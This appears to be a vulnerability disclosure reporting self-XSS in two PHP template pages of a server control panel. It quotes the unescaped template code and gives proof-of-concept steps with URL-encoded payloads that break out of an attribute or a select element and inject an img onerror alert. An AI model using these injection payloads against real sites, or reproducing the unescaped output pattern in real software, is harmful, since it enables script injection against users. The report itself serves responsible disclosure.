Description

Multiple Self-XSS Vulnerabilities are triggered at multiple endpoints.

http://localhost:8083/edit/server/

There is a bug in web/templates/pages/edit_server.php file.
Attacker can control $v_timezone.

<form
		x-data="{
			timezone: '<?= $v_timezone ?? "" ?>',
			theme: '<?= $_SESSION["THEME"] ?>',
			language: '<?= $_SESSION["LANGUAGE"] ?>',
			hasSmtpRelay: <?= $v_smtp_relay == "true" ? "true" : "false" ?>,
			remoteBackupEnabled: <?= !empty($v_backup_remote_adv) ? "true" : "false" ?>,
			backupType: '<?= !empty($v_backup_type) ? trim($v_backup_type, "'") : "" ?>',
			webmailAlias: '<?= $_SESSION["WEBMAIL_ALIAS"] ?? "" ?>',
			apiSystem: '<?= $_SESSION["API_SYSTEM"] ?>',
			legacyApi: '<?= $_SESSION["API"] ?>',
			showSystemOptions: false,
			showProtectionOptions: false,
			showPolicyOptions: false,
		}"
		id="main-form"
		name="v_configure_server"
		method="post"
	>

Proof of Concept

1. Intercept request with Burpsuite 
2. Replace $v_timezone with '}"><img+src%3d""+onerror%3d"alert(1)"><for+x-data%3d"{timezone%3a'

https://drive.google.com/file/d/1VcvdGdSXVDcAoDd1YbW5pWd8IqVKVuiE/view?usp=sharing

http://localhost:8083/add/package/

There is a bug in web/templates/pages/add_package.php file.
Attacker can control $v_backend_template.

	<?php
								foreach ($backend_templates as $key => $value) {
								echo $v_backend_template;
									echo "\t\t\t\t<option value=\"".$value."\"";
									if ((!empty($v_backend_template)) && ( $value == trim($v_backend_template, "'"))){
										echo ' selected' ;
									}
									echo ">".htmlentities($value)."</option>\n";
								}
?>

Proof of Concept

1. Intercept request with Burpsuite 
2. Replace $v_backend_template with '</select><img+src%3d""+onerror%3d"alert(1)">

https://drive.google.com/file/d/1nALSSZ3uUUa9fCC3Xhn1Zz0IJ-ZKYjjV/view?usp=sharing